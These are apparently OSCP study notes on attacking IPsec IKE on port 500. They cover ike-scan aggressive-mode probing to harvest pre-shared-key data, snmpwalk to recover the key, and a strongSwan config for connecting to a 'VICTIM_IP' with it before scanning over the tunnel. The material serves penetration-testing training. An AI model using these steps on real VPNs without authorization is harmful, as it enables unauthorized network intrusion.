O
O
OSCP Notes
Search…
⌃K

500 (IPSEC IKE)

ike-scan IP -A
  • aggressive-mode (-A) get PSK
ike-scan IP -M
  • multi-line - easy to read
  • SA (Security association data) --- copy it.
if a SNMP is open make sure to do some snmpwalk to get VPN PSK data, which you could use with the SA data. (hash type, group)
Life duration -- it will print hexadecimal characters ---> convert it to decimal. ---> hours)
apt install srongswan
once downloaded, you can edit the /etc/ipsec.secrets
paste the followiog:
VICTIM_IP %any ; PSK "paste the plain text PSK"
Edit /etc/ipsec.conf
Unser Sample VPN conections:
conn BOX_NAME
type=transport
keyexchange=ikev1
left=your_IP
leftprotoport=tcp
right=victim-IP
rightprotoport=tcp
authby=PSK
esp=3des-sha1
ike=3des-sha1-mod1024
ikelifetime=8h
auto=start
ipsec start --no fork
-leftprotoport=tcp & rightprotoport=tcp
  • set these if TCP ports are hidden from us.
If no errors, run nmap scan wit -sT option!
(you cannot do a SYN scan---the default scan, when the client is using a VPN service. You have to complete a handshake.)